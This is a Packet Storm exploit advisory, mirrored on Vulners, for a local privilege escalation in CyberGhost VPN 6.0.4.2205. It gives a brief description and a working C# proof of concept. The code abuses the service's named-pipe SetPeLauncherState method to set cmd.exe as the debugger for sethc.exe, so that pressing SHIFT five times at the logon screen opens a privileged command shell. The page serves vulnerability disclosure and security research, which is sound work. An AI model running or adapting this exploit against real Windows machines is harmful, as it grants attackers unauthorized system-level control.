Lucene search
K

CyberGhost 6.0.4.2205 Privilege Escalation

🗓️ 06 Mar 2017 00:00:00Reported by Kacper SzurekType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 35 Views

CyberGhost 6.0.4.2205 Privilege Escalation. Flaw in 'CG6Service' allows debugger launch for any process.

Code
`# Exploit CyberGhost 6.0.4.2205 Privilege Escalation  
# Date: 06.03.2017  
# Software Link: http://www.cyberghostvpn.com/  
# Exploit Author: Kacper Szurek  
# Contact: https://twitter.com/KacperSzurek  
# Website: https://security.szurek.pl/  
# Category: local  
  
1. Description  
  
`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.  
  
https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html  
  
2. Proof of Concept  
  
using System;  
using CyberGhost.Communication;  
  
namespace cyber  
{  
class Program  
{  
static void Main(string[] args)  
{  
Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");  
Console.WriteLine("by Kacper Szurek");  
Console.WriteLine("http://security.szurek.pl/");  
Console.WriteLine("https://twitter.com/KacperSzurek");  
PeLauncherOptions options = new PeLauncherOptions();  
options.ExecuteableName = "sethc.exe";  
options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";  
EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");  
CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);  
Console.WriteLine("Now logout and then press SHIFT key 5 times");  
}  
}  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Mar 2017 00:00Current
0.6Low risk
Vulners AI Score0.6
35